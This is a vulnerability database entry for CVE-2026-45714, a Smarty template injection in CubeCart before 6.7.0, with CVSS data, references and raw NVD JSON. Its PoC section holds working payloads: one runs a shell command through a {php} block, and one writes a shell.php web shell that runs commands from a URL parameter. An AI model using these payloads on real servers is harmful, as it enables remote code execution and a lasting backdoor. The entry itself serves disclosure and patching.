CVE-2026-45714

Description

CubeCart is an ecommerce software solution. Prior to 6.7.0, an Authenticated Server-Side Template Injection (SSTI) vulnerability exists in multiple modules of CubeCart (including Email Templates, Invoices, Documents, and Contact Forms). The application unsafely evaluates user-supplied input using the Smarty template engine without enabling Smarty Security Policies. This allows any authenticated user with administrative privileges to execute arbitrary operating system commands (RCE) on the server. This vulnerability is fixed in 6.7.0.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

CubeCart < 6.7.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

{* Smarty SSTI PoC for CubeCart *}
{* This payload attempts to execute OS commands using the PHP tag if enabled *}
{php}
    // Execute a simple system command (e.g., whoami)
    $output = shell_exec('whoami');
    echo "<pre>Command Output: " . $output . "</pre>";
{/php}

{* Alternative payload using static class calls if PHP tags are disabled but security is off *}
{Smarty_Internal_Write_File::writeFile($script="shell.php", $content="<?php system($_GET['cmd']); ?>", $smarty)}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45714
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45714
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45714/
[4] VulDB https://vuldb.com/cve/CVE-2026-45714
[5] https://github.com/cubecart/v6/security/advisories/GHSA-pcfr-xgc9-xfv6
[6] https://github.com/cubecart/v6/security/advisories/GHSA-pcfr-xgc9-xfv6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45714", "sourceIdentifier": "[email protected]", "published": "2026-05-13T21:16:50.020", "lastModified": "2026-05-14T16:49:18.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CubeCart is an ecommerce software solution. Prior to 6.7.0, an Authenticated Server-Side Template Injection (SSTI) vulnerability exists in multiple modules of CubeCart (including Email Templates, Invoices, Documents, and Contact Forms). The application unsafely evaluates user-supplied input using the Smarty template engine without enabling Smarty Security Policies. This allows any authenticated user with administrative privileges to execute arbitrary operating system commands (RCE) on the server. This vulnerability is fixed in 6.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-1336"}]}], "references": [{"url": "https://github.com/cubecart/v6/security/advisories/GHSA-pcfr-xgc9-xfv6", "source": "[email protected]"}, {"url": "https://github.com/cubecart/v6/security/advisories/GHSA-pcfr-xgc9-xfv6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}